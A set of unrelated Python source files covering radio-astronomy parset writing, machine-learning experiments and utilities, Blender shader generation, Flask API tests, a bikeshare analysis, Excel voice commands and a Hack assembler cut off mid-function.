def save_parset(self, output_path, parset_name, overwrite=True, use_image_names=False):
"""Save the in-memory ``Parset`` to ``output_path/parset_name``.
The saved parset can be fed into ``YandaSoft``
Parameters
==========
output_path: str
Full path to the folder in which the parset will be saved.
parset_name:
Name of the parset file created.
overwrite: bool, optional
If True, then the parset will be overwritten if existed.
use_image_name: bool, optional
The parameter with the same mname defined in ``set_image_names_param_consistency()``.
Basicaly how to handle ambigous naming in the Images. parameters
Returns
========
Parset file: Parset file readable by ``YandaSoft``
Create the parset file at ``output_path/parset_name``
"""
parset_path = os.path.join(output_path, parset_name)
if os.path.isdir(parset_path) and overwrite == False:
raise TypeError('Parset file already exist, and the overwrite parameters is set to False!')
log.debug('Save Parset parameters to: {0:s}'.format(parset_path))
#Sort the parset
self.sort_parset()
log.info('Save parset as: {0:s}'.format(parset_path))
#Check some special considerations
self.special_setup_for_saving_parsets()
with open(parset_path, 'w') as f:
for key in self._parset.keys():
if check_parameter_and_Imager_compatibility(key, imager=self._imager):
#Check preconditioning and use the ._preconditioner attribute instead of the ._param['PNames'] attribute!
if key == 'PNames':
if self._preconditioner == []:
print('#{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping[key],str(self._preconditioner)),file=f)
else:
print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping[key],str(self._preconditioner)),file=f)
elif key in list(_AMBIGOUS_IMAGING_PARAMETERS.keys()) + list(_AMBIGOUS_IMAGING_PARAMETERS.values()):
print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping[key],
str(self._parset[self.set_image_names_param_consistency(key,use_image_names=use_image_names)])),#Use the default imager names parameter for disambiguity
file=f)
elif check_parameter_and_Preconditioner_compatibility(key, preconditioners=self._preconditioner):
#We know that preconditioner and gridder settings are independent!
if check_parameter_and_Gridder_compatibility(key, gridder_name=self._gridder_name):
print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping[key],str(self._parset[key])),file=f)
else:
continue
#A special case, I added in order to secure the pcf output if the dumpgrid option is used
#This is tested in the testing module!
if self._preconditioner == [] and self._imager == 'Cimager' and 'dumpgrids' in self._parset.keys():
log.info('The dumpgrids option is set to {0:s}, but no preconditioning is selected!'.format(str(self._parset['dumpgrids'])))
log.info('This special case is handeled by adding preconditioner=[] and preservecf=True, which results in a pcf output!')
with open(parset_path, 'a') as f:
print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping['PNames'],str(self._preconditioner)),file=f)
print('{0:s}.{1:s} = {2:s}'.format(self._imager,self._mapping['Preservecf'],'true'),file=f)
if __name__ == "__main__":
pass
|
#!/usr/bin/env python
#==============================================================================
import traceback
from olympus import Logger
#==============================================================================
try:
import sqlalchemy
except ModuleNotFoundError:
error = traceback.format_exc()
for line in error.split('\n'):
if 'ModuleNotFoundError' in line:
module = line.strip().strip("'").split("'")[-1]
message = '''Sqlite databases require {module}, which could not be found.
Please install {module} or use a different database backend'''.format(module = module)
Logger.log(message, 'WARNING', only_once=True)
raise ModuleNotFoundError
#==============================================================================
from olympus.databases.database_sqlite.sqlite_operations import AddEntry, UpdateEntries, FetchEntries
from olympus.databases.database_sqlite.sqlite_interface import SqliteInterface
from olympus.databases.database_sqlite.wrapper_sqlite import Wrapper_sqlite
|
"""
The experiment combines the Fourier features and the features extraced from HMM generative model.
After this augmented dataset is created we train and evaluate Random Forest on it.
"""
import numpy as np
from DataNexus.datahandler import DataHandler
from DataNexus.fourier import Fourier
from sklearn.ensemble import RandomForestClassifier
import random
# load the data
train_data = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/train_data.npy")
train_labels = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/train_labels.npy")
test_data = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/test_data.npy")
test_labels = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/test_labels.npy")
#train_data = train_data[:30,:,:]
#train_labels = train_labels[:30]
#test_data = test_data[:30,:,:]
#test_labels = test_labels[:30]
# split the training data into two halves
# fh stands for the first half
# sh stands for the second half
#fh_data, fh_labels, sh_data, sh_labels = DataHandler.split(0.5, train_data, train_labels)
#np.save("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/sh_labels.npy", sh_labels)
fourier_sh_data = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/fourier_sh_data.npy")
fourier_test_data = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/fourier_test_data.npy")
sh_labels = np.load("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/sh_labels.npy")
# introduce 42% of wrong answers to the labels
wrong_ratio = 0.10
wrong_idx = random.sample(range(len(sh_labels)), int(wrong_ratio * len(sh_labels)))
sh_labels_orig = list(sh_labels)
sh_labels[wrong_idx] = 0**sh_labels[wrong_idx]
print "Accuracy of the labels is %f" % (np.sum(sh_labels == sh_labels_orig) / float(len(sh_labels_orig)))
wrong_idx_test = random.sample(range(len(test_labels)), int(wrong_ratio * len(test_labels)))
test_labels_orig = list(test_labels)
test_labels[wrong_idx_test] = 0**test_labels[wrong_idx_test]
# apply fourier transform on the second 50% of the training set
#fourier_sh_data = Fourier.data_to_fourier(sh_data)
#fourier_test_data = Fourier.data_to_fourier(test_data)
#np.save("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/fourier_sh_data.npy", fourier_sh_data)
#np.save("/storage/hpc_anna/GMiC/Data/ECoG/preprocessed/fourier_test_data.npy", fourier_test_data)
#exit()
# augment fourier results of the second 50% train with the real labels thus producing an enriched dataset
enriched_sh_data = np.hstack((fourier_sh_data, sh_labels.reshape(len(sh_labels), 1)))
enriched_test_data = np.hstack((fourier_test_data, test_labels.reshape(len(test_labels), 1)))
#enriched_sh_data = fourier_sh_data
#enriched_test_data = fourier_test_data
# train RF on the enriched dataset
rf = RandomForestClassifier(n_estimators=500)
rf.fit(enriched_sh_data, sh_labels_orig)
# test RF on the test set
print str(rf.score(enriched_sh_data, sh_labels_orig)) + " - accuracy on train data"
print str(rf.score(enriched_test_data, test_labels_orig)) + " - accuracy on test data"
print "Importance of the features"
print list(rf.feature_importances_)[-5:]
|
import bpy
def write(vert, frag):
wrd = bpy.data.worlds['Arm']
is_shadows = '_ShadowMap' in wrd.world_defs
is_shadows_atlas = '_ShadowMapAtlas' in wrd.world_defs
is_single_atlas = '_SingleAtlas' in wrd.world_defs
frag.add_include_front('std/clusters.glsl')
frag.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
frag.add_uniform('vec2 cameraPlane', link='_cameraPlane')
frag.add_uniform('vec4 lightsArray[maxLights * 3]', link='_lightsArray')
frag.add_uniform('sampler2D clustersData', link='_clustersData')
if is_shadows:
frag.add_uniform('bool receiveShadow')
frag.add_uniform('vec2 lightProj', link='_lightPlaneProj', included=True)
if is_shadows_atlas:
if not is_single_atlas:
frag.add_uniform('sampler2DShadow shadowMapAtlasPoint', included=True)
else:
frag.add_uniform('sampler2DShadow shadowMapAtlas', top=True)
frag.add_uniform('vec4 pointLightDataArray[maxLightsCluster]', link='_pointLightsAtlasArray', included=True)
else:
frag.add_uniform('samplerCubeShadow shadowMapPoint[4]', included=True)
vert.add_out('vec4 wvpposition')
vert.write('wvpposition = gl_Position;')
# wvpposition.z / wvpposition.w
frag.write('float viewz = linearize(gl_FragCoord.z, cameraProj);')
frag.write('int clusterI = getClusterI((wvpposition.xy / wvpposition.w) * 0.5 + 0.5, viewz, cameraPlane);')
frag.write('int numLights = int(texelFetch(clustersData, ivec2(clusterI, 0), 0).r * 255);')
frag.write('#ifdef HLSL')
frag.write('viewz += texture(clustersData, vec2(0.0)).r * 1e-9;') # TODO: krafix bug, needs to generate sampler
frag.write('#endif')
if '_Spot' in wrd.world_defs:
frag.add_uniform('vec4 lightsArraySpot[maxLights]', link='_lightsArraySpot')
frag.write('int numSpots = int(texelFetch(clustersData, ivec2(clusterI, 1 + maxLightsCluster), 0).r * 255);')
frag.write('int numPoints = numLights - numSpots;')
if is_shadows:
if is_shadows_atlas:
if not is_single_atlas:
frag.add_uniform('sampler2DShadow shadowMapAtlasSpot', included=True)
else:
frag.add_uniform('sampler2DShadow shadowMapAtlas', top=True)
else:
frag.add_uniform('sampler2DShadow shadowMapSpot[4]', included=True)
# FIXME: type is actually mat4, but otherwise it will not be set as floats when writing the shaders' json files
frag.add_uniform('vec4 LWVPSpotArray[maxLightsCluster]', link='_biasLightWorldViewProjectionMatrixSpotArray', included=True)
frag.write('for (int i = 0; i < min(numLights, maxLightsCluster); i++) {')
frag.write('int li = int(texelFetch(clustersData, ivec2(clusterI, i + 1), 0).r * 255);')
frag.write('direct += sampleLight(')
frag.write(' wposition,')
frag.write(' n,')
frag.write(' vVec,')
frag.write(' dotNV,')
frag.write(' lightsArray[li * 3].xyz,') # lp
frag.write(' lightsArray[li * 3 + 1].xyz,') # lightCol
frag.write(' albedo,')
frag.write(' roughness,')
frag.write(' specular,')
frag.write(' f0')
if is_shadows:
frag.write('\t, li, lightsArray[li * 3 + 2].x, lightsArray[li * 3 + 2].z != 0.0') # bias
if '_Spot' in wrd.world_defs:
frag.write('\t, lightsArray[li * 3 + 2].y != 0.0')
frag.write('\t, lightsArray[li * 3 + 2].y') # cutoff
frag.write('\t, lightsArraySpot[li].w') # cutoff - exponent
frag.write('\t, lightsArraySpot[li].xyz') # spotDir
if '_VoxelShadow' in wrd.world_defs and '_VoxelAOvar' in wrd.world_defs:
frag.write(' , voxels, voxpos')
frag.write(');')
frag.write('}') # for numLights
|
"""
Utility functions for use in neural network construction and processing
"""
from keras.callbacks import EarlyStopping
from keras.models import Sequential
from keras.layers import Dense
from keras.callbacks import Callback
from keras import initializers
import keras.backend as K
from keras.constraints import maxnorm
from keras.layers import Layer
import tensorflow as tf
import logging
import matplotlib; matplotlib.use('Agg') # allow backend matplotlib without setting environment variables
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import roc_curve, auc
from sklearn.preprocessing import label_binarize
import pandas as pd
####################
#
# Global variables for model / backprop
#
EPOCHS = 200 #300 standard number of epochs BEFORE stopping early
LEARNING_RATE = 0.001 # standard learning rate, for static LR only
BATCH_SIZE = 200
VERBOSE_LEVEL = 0 # not verbose
DROPOUT_RATE = 0.5
####################
#
# Final nodes for regression models. All classification models use softmax
#
def fit_model(model, train_data_x, train_data_y):
"""
Runs the model using the train x and train y data
Performs monitoring to stop the learning early if validation loss does not improve
"""
log = logging.getLogger('model.fit')
log.info('model.fit')
early_stop = EarlyStopping(monitor='val_loss', patience=20)
log.info('model currently fitting. This might take a while...')
history = model.fit(train_data_x, train_data_y,
epochs = EPOCHS,
validation_split = VALIDATION_SPLIT,
batch_size = BATCH_SIZE,
verbose = VERBOSE_LEVEL,
callbacks = [early_stop,PrintDot()])
return history
def get_base_optimizer():
"""
Base optimizer. Adagrad was chosen for its stochastic properties
"""
return tf.train.AdagradOptimizer(
LEARNING_RATE
)
def get_base_initializer():
"""
Base initializer
"""
return initializers.glorot_normal()
def get_base_regularizer():
'''
TODO
Base regularizer. Not yet implemented
'''
return
def build_base_model(input_length, round=False):
"""
Builds a base model with nodes derived from a typical DNN for regression
"""
log = logging.getLogger('build_base_model')
log.info('build_base_model')
model = Sequential([
Dense(input_length+1, kernel_initializer = get_base_initializer(), activation=tf.nn.relu,input_shape=(input_length,)),
Dense(input_length/2, kernel_initalizer = get_base_initializer(), activation=tf.nn.relu),
Dense(1, activation='linear')
])
if round:
model.add(Round())
optimizer = get_base_optimizer()
model.compile(loss='mse',
optimizer = optimizer,
metrics=['mae'])
return model
def build_shallow_model(input_length, round=False):
"""
Shallow model that approximates a linear regressor
"""
log = logging.getLogger('build_shallow_model')
log.info('build_shallow_model')
model = Sequential([
Dense(input_length+1, kernel_initializer = get_base_initializer(), activation=tf.nn.relu,input_shape=(input_length,)),
Dense(1, activation='linear')
])
if round:
model.add(Round())
optimizer = get_base_optimizer()
model.compile(loss='mse',
optimizer = optimizer,
metrics=['mae'])
return model
def build_abstract_softmax_classification_model(input_length, nodes, num_classes):
"""
Abstracted model that is user-defined based on the nodes parameter
For classifying to num_classes of classes
"""
log = logging.getLogger('build_abstract_softmax_classification_model')
log.info('build_abstract_softmax_classification_model. Classes = %s' % num_classes)
node_list = [
Dense(input_length+1,
activation=tf.nn.relu,
input_shape=(input_length,),
kernel_constraint=maxnorm(3))
]
node_list.extend([Dense(x, kernel_initializer = get_base_initializer(),activation=tf.nn.relu, kernel_constraint=maxnorm(3)) for x in nodes])
model = Sequential(node_list)
model.add(Dense(int(num_classes), activation=tf.nn.softmax))
optimizer = get_base_optimizer()
model.compile(optimizer = optimizer,
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
return model
def build_abstract_model(input_length, nodes, round=False):
"""
Abstracted model that is user-defined based on the nodes parameter
"""
log = logging.getLogger('build_abstract_model')
log.info('build_abstract_model')
node_list = [
Dense(input_length+1,
activation=tf.nn.relu,
input_shape=(input_length,))
]
node_list.extend([Dense(x, kernel_initializer = get_base_initializer(), activation=tf.nn.relu) for x in nodes])
model = Sequential(node_list)
if round:
model.add(Round())
else:
model.add(Dense(1, activation='linear'))
optimizer = get_base_optimizer()
model.compile(loss='mse',
optimizer = optimizer,
metrics=['mae'])
return model
def plot_epoch_history(history, y_label = "y_units", title = 'EpochHistory.png'):
"""
Plots training and validation losses by epoch count
"""
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import numpy as np
from itertools import chain
plt.figure()
plt.xlabel('Epoch')
plt.ylabel(y_label)
mae = np.array(history.history['acc'])
val_mae = np.array(history.history['loss'])
y_max = np.ceil(max(chain(mae, val_mae)))
plt.plot(history.epoch, mae,
label='Train accuracy')
plt.plot(history.epoch, val_mae,
label = 'Train loss')
plt.legend()
plt.ylim([0, 1])
plt.savefig(title)
def save_data(name, dataframe):
"""
Saves a pandas dataframe
"""
try:
dataframe.to_csv(name, index=False)
return True
except:
return False
class PrintDot(Callback):
"""Container class for tensorflow model printing to stdout"""
def on_epoch_end(self, epoch, logs):
from sys import stdout
# write a '.' for every 100 epochs, print a new line
if epoch % 100 == 0:
stdout.write('\n')
stdout.write('.')
class Round(Layer):
def __init__(self, **kwargs):
super(Round, self).__init__(**kwargs)
def get_output(self, train=False):
X = self.get_input(train)
return K.round(X)
def get_config(self):
config = {"name": self.__class__.__name__}
base_config = super(Round, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def get_micro_auc(y_true, y_probas, classes):
binarized_y_true = label_binarize(y_true, classes=classes)
if len(classes) == 2:
binarized_y_true = np.hstack(
(1 - binarized_y_true, binarized_y_true))
y_probas = np.concatenate(y_probas).ravel().tolist()
fpr, tpr, _ = roc_curve(binarized_y_true.ravel(), y_probas)
roc_auc = auc(fpr, tpr)
return fpr, tpr, roc_auc
if __name__ == '__main__':
pass
|
# Copyright 2020 Siu-Kei Muk (David). All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import flask
from absl.testing import parameterized
import unittest
from unittest import mock
from core import configs
from core import models
from core import utils
from core.routes import patch_routes
from core.routes import restful_test_base
class PatchRoutesURLRuleTestCase(unittest.TestCase):
def setUp(self):
self._app = mock.create_autospec(flask.Flask)
def verify_route(self, route, rule):
route.apply(self._app)
route_fn = self._app.route
route_fn.assert_called_with(rule, methods=["PATCH"])
def testPatchActorRule(self):
route = patch_routes.PatchRoute("actor")
self.verify_route(route, "/actors/<int:actor_id>")
def testPatchMovieRule(self):
route = patch_routes.PatchRoute("movie")
self.verify_route(route, "/movies/<int:movie_id>")
class PatchRoutesTestCase(
restful_test_base.RestfulRouteTestBase, parameterized.TestCase):
def create_app(self):
app = utils.create_app_stub(__name__, configs.AppConfig(mode="test"))
patch_routes.PatchRoute("actor").apply(app)
patch_routes.PatchRoute("movie").apply(app)
return app
@restful_test_base.generate(name=[None, "Test Patch Actor"],
age=[None, 10, 30, 60],
gender=[None, "M", "F"],
movies=[None, [1]])
def testPatchActor(self, name=None, age=None, gender=None, movies=None):
actor = models.Actor.query.get(1)
data = {}
if name:
data["name"] = name
else:
name = actor.name
if age:
data["age"] = age
else:
age = actor.age
if gender:
data["gender"] = gender
else:
gender = actor.gender
if movies:
data["movies"] = movies
movies = [models.Movie.query.get(mid) for mid in movies]
movies = sorted(({"id": m.id, "title": m.title} for m in movies),
key=lambda d: d["id"])
else:
movies = sorted(({"id": m.id, "title": m.title} for m in actor.movies),
key=lambda d: d["id"])
res = self.client.patch("/actors/1", json=data)
self.assertEqual(res.status_code, 200)
self.assertTrue(res.is_json)
res_data = res.json
self.assertEqual(res_data["success"], True)
res_actor = res_data["actor"]
self.assertEqual(res_actor["name"], name)
self.assertEqual(res_actor["age"], age)
self.assertEqual(res_actor["gender"], gender)
self.assertListEqual(
sorted(res_actor["movies"], key=lambda d: d["id"]), movies)
def testPatchActorNotExist(self):
res = self.client.patch("/actors/2", json={})
self.compare_json(res, 404, restful_test_base.ERROR_404)
def testPatchActorInvalidInputKey(self):
res = self.client.patch("/actors/1", json={"invalid": "invalid"})
self.compare_json(res, 400, restful_test_base.ERROR_400)
def testPatchActorInvalidAge(self):
res = self.client.patch("/actors/1", json={"age": "invalid"})
self.compare_json(res, 400, restful_test_base.ERROR_400)
def testPatchActorInvalidGender(self):
res = self.client.patch("/actors/1", json={"gender": "invalid"})
self.compare_json(res, 422, restful_test_base.ERROR_422)
def testPatchActorInvalidMovies(self):
res = self.client.patch("/actors/1", json={"movies": "invalid"})
self.compare_json(res, 400, restful_test_base.ERROR_400)
def testPatchActorNonExistMovies(self):
res = self.client.patch("/actors/1", json={"movies": [2]})
self.compare_json(res, 422, restful_test_base.ERROR_422)
@restful_test_base.generate(title=[None, "Test Patch Title"],
release_date=[None, "1970-01-01", "2019-07-21"],
actors=[None, [1]])
def testPatchMovie(self, title=None, release_date=None, actors=None):
movie = models.Movie.query.get(1)
data = {}
if title:
data["title"] = title
else:
title = movie.title
if release_date:
data["release_date"] = release_date
else:
release_date = movie.release_date.isoformat()
if actors:
data["actors"] = actors
actors = [models.Actor.query.get(aid) for aid in actors]
actors = sorted(({"id": a.id, "name": a.name} for a in actors),
key=lambda d: d["id"])
else:
actors = sorted(({"id": a.id, "name": a.name} for a in movie.actors),
key=lambda d: d["id"])
res = self.client.patch("/movies/1", json=data)
self.assertEqual(res.status_code, 200)
self.assertTrue(res.is_json)
res_data = res.json
self.assertEqual(res_data["success"], True)
res_movie = res_data["movie"]
self.assertEqual(res_movie["title"], title)
self.assertEqual(res_movie["release_date"], release_date)
self.assertListEqual(
sorted(res_movie["actors"], key=lambda d: d["id"]), actors)
def testPatchMovieNotExist(self):
res = self.client.patch("/movies/2", json={})
self.compare_json(res, 404, restful_test_base.ERROR_404)
def testPatchMovieInvalidInputKey(self):
res = self.client.patch("/movies/1", json={"invalid": "invalid"})
self.compare_json(res, 400, restful_test_base.ERROR_400)
def testPatchMovieInvalidReleaseDate(self):
res = self.client.patch("/movies/1", json={"release_date": "invalid"})
self.compare_json(res, 422, restful_test_base.ERROR_422)
def testPatchMovieInvalidActors(self):
res = self.client.patch("/movies/1", json={"actors": "invalid"})
self.compare_json(res, 400, restful_test_base.ERROR_400)
def testPatchMovieNonExistActors(self):
res = self.client.patch("/movies/1", json={"actors": [2]})
self.compare_json(res, 422, restful_test_base.ERROR_422)
if __name__ == '__main__':
unittest.main()
|
import os
import numpy as np
import matplotlib.pyplot as plt
data_path = './data/bikeshare/'
data_filenames = ['2017-q1_trip_history_data.csv', '2017-q2_trip_history_data.csv',
'2017-q3_trip_history_data.csv', '2017-q4_trip_history_data.csv']
# 结果保存路径
output_path = './output'
if not os.path.exists(output_path):
os.makedirs(output_path)
# 直方图参数
hist_range = (0, 180)
n_bins = 12
def collect_and_process_data():
"""
Step 1+2: 数据获取,数据处理
"""
year_duration_member_type_list = []
for data_filename in data_filenames:
data_file = os.path.join(data_path, data_filename)
data_arr = np.loadtxt(data_file, delimiter=',', dtype='str', skiprows=1)
# 去掉双引号
# 骑行时间
duration_col = np.core.defchararray.replace(data_arr[:, 0], '"', '')
duration_col = duration_col.reshape(-1, 1)
# 用户类型
member_type_col = np.core.defchararray.replace(data_arr[:, -1], '"', '')
member_type_col = member_type_col.reshape(-1, 1)
duration_member_type_arr = np.concatenate([duration_col, member_type_col], axis=1)
year_duration_member_type_list.append(duration_member_type_arr)
year_duration_member_type_arr = np.concatenate(year_duration_member_type_list, axis=0)
member_arr = year_duration_member_type_arr[year_duration_member_type_arr[:, 1] == 'Member']
casual_arr = year_duration_member_type_arr[year_duration_member_type_arr[:, 1] == 'Casual']
year_member_duration = member_arr[:, 0].astype('float') / 1000 / 60
year_casual_duration = casual_arr[:, 0].astype('float') / 1000 / 60
return year_member_duration, year_casual_duration
def analyze_data(year_member_duration, year_casual_duration):
"""
Step 3: 数据分析
"""
m_duration_hist, m_bin_edges = np.histogram(year_member_duration, range=hist_range, bins=n_bins)
c_duration_hist, c_bin_edges = np.histogram(year_casual_duration, range=hist_range, bins=n_bins)
print('会员直方图统计信息:{}, 直方图分组边界:{}'.format(m_duration_hist, m_bin_edges))
print('非会员直方图统计信息:{}, 直方图分组边界:{}'.format(c_duration_hist, c_bin_edges))
def save_and_show_results(year_member_duration, year_casual_duration):
"""
Step 4: 结果展示
"""
fig = plt.figure(figsize=(10, 5))
ax1 = fig.add_subplot(1, 2, 1)
ax2 = fig.add_subplot(1, 2, 2, sharey=ax1)
# 会员直方图
ax1.hist(year_member_duration, range=hist_range, bins=n_bins)
ax1.set_xticks(range(0, 181, 15))
ax1.set_title('Member')
ax1.set_ylabel('Count')
# 非会员直方图
ax2.hist(year_casual_duration, range=hist_range, bins=n_bins)
ax2.set_xticks(range(0, 181, 15))
ax2.set_title('Casual')
ax2.set_ylabel('Count')
plt.tight_layout()
plt.savefig(os.path.join(output_path, 'type_histogram.png'))
plt.show()
def main():
"""
主函数
"""
# Step 1 + 2: 数据获取,数据处理
year_member_duration, year_casual_duration = collect_and_process_data()
# Step 3: 数据分析
analyze_data(year_member_duration, year_casual_duration)
save_and_show_results(year_member_duration, year_casual_duration)
if __name__ == '__main__':
main()
|
"""
Command-module for Microsoft Excel
You also can find some good vocola commands for Excel on Mark Lillibridge's Github:
https://github.com/mdbridge/bit-bucket/tree/master/voice/my_commands/commands
Alex Boche 2019
"""
# this function takes a dictionary and returns a dictionary whose keys are sequences of keys of the original dictionary
# and whose values our the corresponding sequences of values of the original dictionary
from dragonfly import Repeat, Dictation, Choice, MappingRule, Repetition
from castervoice.rules.core.alphabet_rules import alphabet_support # Manually change in port in if in user directory
from castervoice.lib.actions import Text, Key
from castervoice.lib.ctrl.mgr.rule_details import RuleDetails
from castervoice.lib.merge.additions import IntegerRefST
from castervoice.lib.merge.state.short import R
class ExcelRule(MappingRule):
mapping = {
"next sheet [<n>]":
R(Key("c-pgdown"))*Repeat(extra='n'),
"(prior | previous) sheet [<n>]":
R(Key("c-pgup"))*Repeat(extra='n'),
"[select] cell <column_1> <row_1>":
R(Key("c-g") + Text("%(column_1)s%(row_1)s") + Key("enter")),
"select <column_1> <row_1> through <column_2> <row_2>":
R(Key("c-g") + Text("%(column_1)s%(row_1)s:%(column_2)s%(row_2)s") +
Key("enter")),
"go to cell":
R(Key("c-g")),
"select current column":
R(Key("c-space")),
"select current row":
R(Key("s-space")),
"top of column":
R(Key("c-up")),
"beginning of row":
R(Key("c-left")),
"insert stuff":
R(Key("cs-plus")),
"insert row":
R(Key("cs-plus, a-r, enter")),
"insert column":
R(Key("cs-plus, a-c, enter")),
"insert cell [to the] left":
R(Key("cs-plus, a-i, enter")),
"insert cell above":
R(Key("cs-plus, a-d, enter")),
"insert pivot table":
R(Key("a-n, v")),
"insert pivot chart":
R(Key("a-n, s, z, c")),
"add-ins":
R(Key("a-t, i")),
"add border":
R(Key("cs-ampersand")),
"arrange Windows":
R(Key("a-w/10, a")),
"auto sum":
R(Key("a-equal")),
"freeze panes":
R(Key("a-w, f")),
# From Mark Lillibridge regarding the edit cell command below:
# There are at least two modes, edit (blue background) and enter (yellow background).
# In enter mode for formulas, arrow keys select a
# cell (range if shifted), whereas in edit mode, they move the cursor
# inside the formula. For non-formulas, in enter mode, the arrows
# finished entering the current cell and move to another cell.
#
# and "edit cell" initially switch to edit mode then
# toggle thereafter for the given cell. Typing initially puts you in
# enter mode.
#
# edit cell: always edits directly in cell (blue background)
#
# this has the effect of pressing F2 without DNS around.
#
# Want "edit directly in cell" option turned off:
# Office button->advanced-> turn off allow editing directly in cells
# (Dragon handles edit in cell directly badly)
#
# First time, edits current cell via formula bar. Unlike with
# editing directly in a cell, this highlights ranges and cells used.
"toggle edit cell":
R(Key("f2")),
}
extras = [
Dictation("dict"),
IntegerRefST("n", 1, 10),
IntegerRefST("row_1", 1, 100),
IntegerRefST("row_2", 1, 100),
# change max to 3 if you want sequences of lentgh three and so on
Repetition(Choice("alphabet1", alphabet_support.caster_alphabet()), min=1, max=2, name="column_1"),
Repetition(Choice("alphabet2", alphabet_support.caster_alphabet()), min=1, max=2, name="column_2")
]
defaults = {"n": 1, "dict": ""}
def get_rule():
return ExcelRule, RuleDetails(name="excel", executable="excel")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 15 14:33:56 2019
@author: khalilsleimi
Notation: ** A raw assembly file is a (*.asm) with comments(single line and multiline) and empty lines, and spaces in actual commands (we suppose a command per line at most)
** A Clean Assembly file is a (Clean_*.asm) containing no comments or empty lines or spaces, just one command per line
** A Translatable file is a (Translatable_*.asm) with no labels or symbolic variables, just known memory locations and instructions locations
** A Translatable Command is a string that can be taken from a line of a Translatable file (that is satisfying its' same conditions)
** A Hack Machine Language Command is a command that can be executed on the Hack computer
"""
def CleanAssembly(FileName, CleanFileName):
"""
Input: Takes in a raw assembly file FileName (given by its name: a string).
Takes a Clean Assembly file (given by its name: a string).
Output: Produce a Clean Assembly File. Saved in CleanFileName
Purpose: Strip all comments, empty lines and spaces from the file. Leaving only one command per line. Save result in file specified by CleanFileName
"""
ToClean = open(FileName, 'r')
SaveIn = open(CleanFileName, 'w')
SaveInList = []
LinesToClean = ToClean.readlines()
for line in LinesToClean:
if line[0:2] != "//" and line!="" and line!="\n": #a random amount of spaces and returns and multiline comments
SaveInList.append(ExtractCommand(line))
print(SaveInList[-1])
SaveInList[-1]=SaveInList[-1][:-1]
#SaveInList.append("\n")
SaveIn.writelines(SaveInList)
ToClean.close()
SaveIn.close()
"for now just a simple Comments handlers"
def ExtractCommand(line):
"""
Input: a line that might contain a command and some comment
Output: the command itself
Purpose: extract the command from all the giberish, if none is found return nothing
"""
result=""
line=line.lstrip()
line=line[:line.find("//")]
line=line.rstrip()
line+='\n'
return line
def TranslatableAssembly(CleanFileName, TranslatableFileName):
"""
Input: Takes a Clean Assembly file (given by its name: a string).
Takes a TranslatableFileName (given by its name: a string).
Output: Produce a Translatable Assembly file. Saved in TranslatableFileName
Purpose: Replace all labels with corresponding instruction number and variables with corresponding memory addresses. Save result in file specified by TranslatableFileName
I assume there are no bad lines of code
"""
dictio={"R0":0, "R1":1, "R2":2, "R3":3, "R4":4, "R5":5, "R6":6, "R7":7,
"R8":8, "R9":9, "R10":10, "R11":11, "R12":12, "R13":13, "R14":14,
"R15":15, "SCREEN":2**14, "KBD":3*2**13, "SP":0, "LCL":1, "ARG":2,
"THIS":3, "THAT":4}
lineCount=0
ToTranslatable = open(CleanFileName, 'r')
SaveIn = open(TranslatableFileName, 'w')
SaveInList = []
#What if a label is defined after being used the first time?? We deal with that!
LinesToTranslatable = ToTranslatable.readlines()
#print(LinesToTranslatable)
for line in LinesToTranslatable: #Catch all labels to avoid handling a label before its' definition
if line[0]=="(" and line[-2]==")": #Because line[-1]=="\n"
dictio[line[1:-2]]=lineCount #If it is 0 it'll get 0
lineCount-=1 #Remember, labels definitions aren't translated, they point to next line
#SaveInList.append("@"+str(dict[line[1:]])) #If it is a label we don't put it
lineCount+=1
varcount=16
#print(dictio)
for line in LinesToTranslatable: #Does it loop this one as well?
if line[0]!='(' and line[-1]!=')':
if line[0]=="@":
#Deal with variable or label usage
try:
int(line[1:])
SaveInList.append(line) #If it's a number then just put it! we don't need to do anything
#SaveInList.append("\n")
except ValueError: #if it is not a number It'll raise a ValueError. If it's not a number, it's a variable (or label)
if line[1:-1] not in dictio: #By default only labels are here, so if a variable is not already here, then add it // line[1:-1] to avoid "@" and "\n"
dictio[line[1:-1]]=varcount
varcount+=1 #An extra variable
SaveInList.append("@"+str(dictio[line[1:-1]])+"\n")
else:
#Just put it in Translatable File It is OK, it is just a simple instruction.
SaveInList.append(line)
#This particular design is very good, it avoids mixing up the search for labels and the search for variables, it saves some memory, but it takes the same amount of time!! remember you need to know labels before you begin replacing them so there's always 2 for loops
#print(dictio)
#print(SaveInList)
#SaveInList.append("\n")
SaveInList[-1]=SaveInList[-1][:]+"\n"
SaveIn.writelines(SaveInList)
ToTranslatable.close()
SaveIn.close()
return
def AssembleToHackMachine(TranslatableFileName, HackFileName):
"""
Input: Takes a TranslatableFileName (given by its name: a string).
Takes a HackFileName file (given by its name: a string).
Output: Produce a file in the Hack Machine language (*.hack). Saved in HackFileName
Purpose: Translate the Translatable Assembly file into the Hack Machine Language. Save result in file specified by HackFileName
"""
ToTranslate = open(TranslatableFileName, 'r')
SaveIn = open(HackFileName, 'w')
